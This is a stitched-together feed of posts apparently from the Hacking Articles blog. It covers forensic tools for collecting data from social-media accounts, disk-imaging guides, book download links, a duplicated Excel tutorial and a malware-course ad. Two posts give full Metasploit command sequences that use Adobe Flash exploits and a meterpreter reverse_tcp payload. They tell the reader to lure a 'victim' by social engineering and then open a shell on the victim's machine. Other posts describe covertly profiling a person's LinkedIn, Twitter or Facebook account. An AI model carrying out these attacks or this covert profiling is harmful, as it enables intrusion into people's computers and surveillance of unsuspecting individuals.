Linkedin forensic toolkit is a Forensic tool where you can investigate on a desired user LinkedIn account hence you can get all the information such as (Profile, Connections, All Discussions, etc.)

The main advantage is the user wont able knows his account was viewed by the investigator.

 Download LinkedIn forensic toolkit from here and install it in your pc

Now open LinkedIn forensic tool kit and click on “New Case”

Here you must choose the following option as I choose for profile id which I have the URL of the user id which will be easy to find, and proceed to next step.

Here in new case you must enable all option to display all the user information that is in linkedin account from when he or she created the account to today’s date. Now proceed to next step.

Now in new case first you have to choose the location where you want to save the report
eg: C:\Users\RAJ\Desktop\linkedin

And the fill the remaining information such as case number, Evidence number,description,note etc.

And also enable the AUTO LOG optio And proceed to next step.

Now in the input field type in the user linkedin account url or simply find it and copy paste it.
proceed to next step.

Now here it will ask for authentication code, for that click on the OPEN WEB PAGE

When you click on the open web page you will be redirected to a web page where you have to give your
authentication details (no account details will be disclosed after entering your credentials) and click on allow access.

Now an authentication code will be generated and copy that code and then type or paste the code where authentication code was requested.

Now I have given the authentication code, where it was generated when you give you login with your details 

Now the start the process and let the process finish.

After the process has completed you can see the complete information about the users linkedin account.

Now you can see the information in XML form including all the data, and for other information related to user linkedin account will be saved in file location where you have given as I gave

Eg: C:\Users\RAJ\Desktop\linkedin

Author: Devjeet Singh is an young Indian Entrepreneur and Cyber Security Researcher. He is acknowledged by Microsoft, Adobe, Nokia, and blackberry.

The post How to perform Forensic Investigation on user Linkedin Account appeared first on Hacking Articles.

Intro: YouTube Forensic toolkit is a great tool which has abilities to gather information like User videos, channel videos, and category type videos, here in this tool you can do lot more things than you do in YouTube where you can see in below description.

First download the YouTube forensic tool from here and install it on your system

Now after installation, open the YouTube forensic tool fill the required Fields like Investigator name , Operation name , Case Number , Case File Location, Case Description and give the location to save the report of the investigation

Click on save to proceed to next step.

Now in next step you can see lot of options such as Most popular, keyword search, URL Search, User Search, as I chose keyword search as I am not targeting on any user or channel if you want to target on any channel or user then choose URL search or User search and type the username or paste the url from youtube
Now my keyword is hacking articles and chose category as Tech and results can be random as I chose 25.

And click on search to start searching the chosen option.

After searching is complete you can see the result as per the option you have chosen as I chose hacking articles as key word, my result will be displaying results to hacking articles. Here you can see the following (Video title, video comment, video likes, username, last updated , keywords, category )

Now here you can also do the following as (Download video, View comments, request suspense and etc.)

For that right click on the video and select the following to perform the task
also you can check the full report from the folder location you have given at starting step.

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post How to Perform Forensic Investigation on YouTube appeared first on Hacking Articles.

Twitter forensic toolkit is a Forensic tool where you can Investigate on a criminal or a prime suspect’s Twitter  account hence you can get all the information such as (User profile, number of tweets and tweet by user and date , total followers, total following ,etc.)

Download Twitter forensic toolkit from here and install it in your pc

Now fill the required fields such as Investigator name, Operation Name, Case Number, case Description also give a file location to save the report of any twitter user account.

Eg:C\Users\RAJ\Desktop Save to proceed to next step

Now in next step you have to choose a option that are search tweets by a User, To a User, To and from user, referencing a user, now choose according to your requirement, as I have chose by user and I have given the account URL to get all the information from the user twitter account as well as results are random as I given 25. Now click on search button to proceed next step.

Here you can see the consumer key and consumer secret and get pin
there you have to click on Get Pin to get the code

Here to get pin, first it will ask for your twitter account login (not the suspect account login details ) and then a pin will be generated as shown below, copy it.

Paste the pin and click on authorize to start processing of required twitter account.

Here after completing the process you can see competes report of the desired twitter account, such as count of tweets, followers, following, likes. As well has all the tweets including date and time will be displayed.

Now on the toolbar select TOOLS and select configuration and windows will be opened where you can see some options like enable Real time monitoring to update the user tweets upto date, even you can configure your email to get the report to your email address.

And the rest of the report will be saved in the folder location that was given in the first step.

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post Forensic Investigation of any Twitter account appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Learning iOS Forensics appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Phishing Dark Waters The Offensive and Defensive Sides of Malicious Emails appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Practical Mobile Forensics appeared first on Hacking Articles.

(From  forensicswiki.org )

The Forensic Toolkit Imager (FTK IMAGER) is a commercial forensic Imaging software package distributed by Access Data  (AccessData offers computer forensics software and training. Their flagship product is Forensic Toolkit, but they offer several others)

FTK Imager supports storage of disk images in EnCase’s or SMART’s file format, as well as in raw (dd) format. With Isobuster technology built in,

IMPORTANT: before proceeding must make sure that when using FTK Imager to create a forensic image of a suspect’s hard drive, make sure you are using a hardware-based write blocking device. This ensures that your operation system does not alter the suspect’s hard drive when you attach the drive to your computer.

First Download FTK Imager from (http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.2.0) and install the FTK Imager

Now open the FTK Imager and Click on Create Disk Image

Now a “Select source” box will open and choose “Physical Drive” click NEXT  

Now choose the drive of the Suspect Evidence you want to make image.

After choosing the Drive Click on finish to Start Creating Image of Suspect Evidence

(Note: choose option “Verify images after they are created”)

Now in Select Image Type Choose “Raw (dd)” and click on NEXT

Now In” Evidence Item Information” Fill the Following attributes, as you can see some random information given can be random as per the Suspects Evidence. Click NEXT

Now choose the location of the image you want to create and Name the Image Filename. And click on FINISH

Now in final Step Click START button to start Creating Image.

Now the Processing has started wait till the Creation completes.

As we choose Verify images after they are created, the process will verify and complete.

Successfully the Suspects Evidence Image Is Created .Now You can audit the Suspects evidence from The image Created from FTK Imager.

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post How to create copy of Suspects Evidence Using (FTK Imager) appeared first on Hacking Articles.

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_copy_pixel_to_byte_array

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set lhost 192.168.1.16 (IP of Local Host)

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set srvhost 192.168.1.16

msf exploit (adobe_flash_copy_pixel_to_byte_array)>set uripath /

msf exploit (adobe_flash_copy_pixel_to_byte_array)>exploit

Now an URL you should give to your victim http://192.168.1.16:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.16:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

The post Hack Remote Windows PC using Adobe Flash Player copy Pixels to ByteArray Integer Overflow appeared first on Hacking Articles.

Facebook forensic toolkit is a Forensic tool where you can Investigate on a criminal or a prime suspect’s facebook account hence you can get all the information such as (User info, profile, Timeline, Messages, Events, Albums, Group, Likes, Friends, Contacts)

Download FaceBook forensic toolkit from here and install it in your pc

Now open FaceBook forensic tool kit and click on “Examine Profile and Clone Data”

Now in New Case – Information, Browse the location to save the report
for example: C:\Users\RAJ\Desktop\facebookforensic

Now fill the following details like case number, evidence number, description, examiner, Notes.

Now click on next button

Now in next step you have to enter the desired FaceBook account URL
for example: www.facebook.com/yourprofile Proceed for the next step.

Now in new case – Evidence step you have to choose the content that you want to search in desired FaceBook account like in the image I have chose to show all content, now I can see all the content

In this step you have to authenticate with your FaceBook account to proceed the process

Note: Desired FaceBook account authentication is not required.  And no FaceBook account details will be disclosed

Now on the top right corner you can see start button to start the process click the button and start the process. And wait until the toolkit gathers all the information from the desired facebook account.

Now you can see the result, as I choose to show all the content from desired facebook account.

All the content like profile, Timeline, photo albums, and etc. will be shown for the desired facebook account, here in the image displaying the desired accounts profile

Here in timeline FFT displaying information as XML form but all the data required is shown in text.

Here in the image you can see the categories user has liked
eg: website, actor, cars, etc.

Here you can see the user groups and to which group he is administrator.

Now when you complete the process then a report will be created with a name Eg: report-2124

In location you given at second step as I have given location as  C:\Users\RAJ\Desktop\facebookforensic Report will be saved there
Now open the report and you can see each and every content that user has done in his facebook account including facebook post with date.

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post Forensic Investigation of any FaceBook Profile appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post A Practical Guide to Computer Forensics Investigations appeared first on Hacking Articles.

Cell Referencing is very important term used in excel formula. Cell Referencing means one cell address is referenced into another cell to do calculations.

There are three types of referencing:

• Relative Referencing
• Absolute Referencing
• Mixed Referencing

Relative Referencing

By Default, Relative Referencing is used in Excel.  Now   see the example of Relative Referencing. Look at formula in cell G2 which references to cell C2, cell D2, cell E2 & cell F2. When we copy this formula by dragging the lower right corner of the cell G1 to another cell  location such as G2 to G11. The relative referencing will take place.  Because G3 references to cell C3, Cell D3, Cell E3 & Cell F3 relatively.

Absolute Referencing

Absolute referencing will be used when we want to make our cell address fixed. See the formula in cell G2 which computes Gross Salary in which TA is fixed for each employee. To Make the Cell F2 as fixed, assign $ sign with column name as well as row number. Then drag lower right corner of cell G2 up to cell G11.

Let us see another example of Absolute Referencing.

In this exmple , we are calculating the simple interrest by multipling principle, rate and time. When we drag  the formula  from F5 to F9, it shows the result as 0 . Because cell D7 containing Principle and Cell  E5 containing Rate are absolute.

So  to make the  cell  D7 and Cell E7  absolute assign $ sign in column name and row number of cell D7 and E7 in formula cell G7. Now drag lower right corner of the cell G7 upto cell G11. Now see the result ,it shows correct values.

Mixed Referencing

Combination of Relative Referencing and Absolute Referencing is referred as Mixed Referencing. In this example, we are calculating the Simple Interest in cell G9 by multiplying F8, G8 and G9. When we drag from G9 to K9 and Then K13. It shows wrong values.

To rectify this use mixed referencing. Use $ sign with column name and row number of cell f8, and assign $ sign with row number of the cell G8 which is common to all cells of rate value. Similarly assign $ sign with column name of cell F8 which is common to all cells of time value. Now it shows correct values.

Author: Mukul Mohan is a Certified MSCE, MCSA. He is Experienced Corporate Trainer with +20 Years experience. Now he is working with Ignite Technologies as a corporate trainer. if you are interested for Microsoft Server 2008 and Advance Excel you can contact him at mukul@ignitetechnologies.in

The post How to Perform Cell Referencing in Excel appeared first on Hacking Articles.

Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what exactly happened on a computer. You can even use it to recover photos from your camera’s memory card for case investigation.

Autopsy features.

• Timeline Analysis:Displays system events in a graphical interface to help identify activity.
• Keyword Search:Text extraction and index searched modules enable you to find files that mention specific terms and find regular expression patterns.
• Web Artifacts:Extracts web activity from common browsers to help identify user activity.
• Registry Analysis:Uses RegRipper to identify recently accessed documents and USB devices.
• LNK File Analysis:Identifies short cuts and accessed documents
• Email Analysis:Parses MBOX format messages, such as Thunderbird.
• EXIF:Extracts geo location and camera information from JPEG files.
• File Type Sorting:Group files by their type to find all images or documents.
• Media Playback:View videos and images in the application and not require an external viewer.
• Thumbnail viewer:Displays thumbnail of images to help quick view pictures.
• Robust File System Analysis:Support for common file systems, including NTFS, FAT12, FAT16, FAT32, HFS+, ISO9660 (CD-ROM), Ext2, Ext3, and UFS from The Sleuth Kit.
• Hash Set Filtering:Filter out known good files using NSRL and flag known bad files using custom hashsets in HashKeeper, md5sum, and EnCase formats.
• Tags:Tag files with arbitrary tag names, such as ‘bookmark’ or ‘suspicious’, and add comments.
• Unicode Strings Extraction: Extracts strings from unallocated space and unknown file types in many languages (Arabic, Chinese, Japanese, etc.).
• File Type Detectionbased on signatures and extension mismatch detection.
• Interesting Files Modulewill flag files and folders based on name and path.
• Android Support: Extracts data from SMS, call logs, contacts, Tango, Words with Friends, and more.

First Download autopsy from here and install in your pc

Click New Case. The ‘Create a New Case’ page will open Even you can use a device clone which was earlier created click here to view

Fill in the ‘Case Name’, ‘Base Directory’and choose the location to save the report Eg:c\users\raj\desktop\autopsy report

Then click on next to proceed to next step. 

Here in next step you have to enter the case number and Examiner details and click on finish to proceed to next step.

Here now in Add Data Sourceyou have to complete the three steps

In first step that is Enter data Source Information  select the following as local disk, location of local disk, time zone as per your location, click on next to proceed to step 2

In Step 2 Configure ingest Modules I have chosen all the modules as I was discussing about complete information on evidence device or disk or computer etc. and click next for step 3

In Add Data Source just click on finish to generate the report of the device and you can perform complete investigate on the victim device or pc or any disk

Here you can see the local disk of the user we can completely analyze  it from here without accessing the actual data in local disk, you can see Data Sources, Views , Results, Email messages, Interesting items, etc.

Now finally when you choose the Data Sources and select the drive we choose you can see the following details will be shown in the image as all the files and folder available in local disk And also with their Modified Time, Change time, Access time, etc.

With these you can investigate on user details in local disk as well as know which file was deleted from the disk and with their time and date along with information. 

Author “Abdul Salam is a cyber security researcher and Corporate Trainer of Ignite Technologies. He is Having 2+ Year Experience in Cyber Security.

The post Forensic Investigation of victim pc using Autopsy appeared first on Hacking Articles.

Do you know how to hack an app? Do you want to learn? All it takes is a few readily available tools and a matter of minutes for today’s hackers to successfully exploit a mobile application. To see how it’s done, watch these short clips below as Jonathan Carter from Arxan Technologies demonstrates just how easy it is for hackers to perform mobile attack vectors.

iTunes Code Encryption Bypass

Android APK Reverse Engineering

Algorithm Decompilation and Analysis

Baksmali Code Modification

Reverse Engineering String Analysis

Swizzle with Code Substitution

Understanding application internal structures and methods via Class Dumps

For more information on how to address these threats and harden the security of your own app, visit Arxan’s application protection page.

The post Learn How to Hack an App Video Series appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Learning Android Forensics appeared first on Hacking Articles.

This module exploits an unintialized memory vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::Uncompress Via ZlibVariant method, which fails to initialize allocated memory. When using a correct memory layout this vulnerability leads to a ByteArray object corruption, which can be abused to access and corrupt memory. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash 15.0.0.189.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set lhost 192.168.1.13 (IP of Local Host)

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set srvhost 192.168.1.13

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>set uripath /

msf exploit (adobe_flash_uncompress_zlib_uninitialized)>exploit

Now an URL you should give to your victim http://192.168.1.13:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.13:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

The post Hack Remote Windows PC using Adobe Flash Player Uncompress Via Zlib Variant Uninitialized Memory appeared first on Hacking Articles.

http://www.ignitetechnologies.in/malware.php ( for Course Content )

http://www.ignitetechnologies.in/registration.php ( for Registration )

Why should you learn malware development techniques (computer virology)?

1. Those who should not know it, already know it.
2. You cannot fight bad guys by disarming good guys.
3. It forces you to see the computer science and engineering from completely new perspective.
4. It forces you to brush the concepts from various sub-fields of CS (theoretical and practical both).
5. It enables you to think like a bad guy, which comes handy in hunting for bad guys.

How does it benefit you?

After learning computer virology, you get deep knowledge about internals of computer malware. A lot of malware techniques have legitimate usage as well
(e.g. anti-piracy, legitimate monitoring tools etc). With the knowledge of malware internals, you can quickly switch to malware analysis and malware detection, and help other fighting malicious software.

Possible Job Profiles

1. Malware analyst
2. Malware researcher (working on new possible techniques and then their detection mechanism. Prevent the malware even before it is born)
3. Research on highly sophisticated attacks

Basically, your job will be revolve around malicious codes,

The post Learn Malware Development appeared first on Hacking Articles.

From Wikipedia

The International Mobile Station Equipment Identity or IMEI is a number, usually unique, to identify 3GPP (i.e., GSM, UMTS and LTE) and iDEN mobile phones, as well as some satellite phones. It is usually found printed inside the battery compartment of the phone, but can also be displayed on-screen on most phones by entering *#06#on the dial pad, or alongside other system information in the settings menu on Smartphone operating systems.

The IMEI number is used by a GSM network to identify valid devices and therefore can be used for stopping a stolen phone from accessing that network. For example, if a mobile phone is stolen, the owner can call his or her network provider and instruct them to “blacklist” the phone using its IMEI number. This renders the phone useless on that network and sometimes other networks too, whether or not the phone’s SIM is changed.

The IMEI is only used for identifying the device and has no permanent or semi-permanent relation to the subscriber. Instead, the subscriber is identified by transmission of an IMSI number, which is stored on a SIM card that can (in theory) be transferred to any handset. However, many network and security features are enabled by knowing the current device being used by a subscriber.

Open google.com/settings, sign-in with your Google account and expand the Android tab.

The post How to Find your IMEI No. of Your Lost Android Phone appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post Building Virtual Pentesting Labs for Advanced Penetration Testing appeared first on Hacking Articles.

Download

Password: www.hackingarticles.in

The post A Practical Guide to Computer Forensics Investigations appeared first on Hacking Articles.

Cell Referencing is very important term used in excel formula. Cell Referencing means one cell address is referenced into another cell to do calculations.

There are three types of referencing:

• Relative Referencing
• Absolute Referencing
• Mixed Referencing

Relative Referencing

By Default, Relative Referencing is used in Excel.  Now   see the example of Relative Referencing. Look at formula in cell G2 which references to cell C2, cell D2, cell E2 & cell F2. When we copy this formula by dragging the lower right corner of the cell G1 to another cell  location such as G2 to G11. The relative referencing will take place.  Because G3 references to cell C3, Cell D3, Cell E3 & Cell F3 relatively.

Absolute Referencing

Absolute referencing will be used when we want to make our cell address fixed. See the formula in cell G2 which computes Gross Salary in which TA is fixed for each employee. To Make the Cell F2 as fixed, assign $ sign with column name as well as row number. Then drag lower right corner of cell G2 up to cell G11.

Let us see another example of Absolute Referencing.

In this exmple , we are calculating the simple interrest by multipling principle, rate and time. When we drag  the formula  from F5 to F9, it shows the result as 0 . Because cell D7 containing Principle and Cell  E5 containing Rate are absolute.

So  to make the  cell  D7 and Cell E7  absolute assign $ sign in column name and row number of cell D7 and E7 in formula cell G7. Now drag lower right corner of the cell G7 upto cell G11. Now see the result ,it shows correct values.

Mixed Referencing

Combination of Relative Referencing and Absolute Referencing is referred as Mixed Referencing. In this example, we are calculating the Simple Interest in cell G9 by multiplying F8, G8 and G9. When we drag from G9 to K9 and Then K13. It shows wrong values.

To rectify this use mixed referencing. Use $ sign with column name and row number of cell f8, and assign $ sign with row number of the cell G8 which is common to all cells of rate value. Similarly assign $ sign with column name of cell F8 which is common to all cells of time value. Now it shows correct values.

Author: Mukul Mohan is a Certified MSCE, MCSA. He is Experienced Corporate Trainer with +20 Years experience. Now he is working with Ignite Technologies as a corporate trainer. if you are interested for Microsoft Server 2008 and Advance Excel you can contact him at mukul@ignitetechnologies.in

The post How to Perform Cell Referencing in Excel appeared first on Hacking Articles.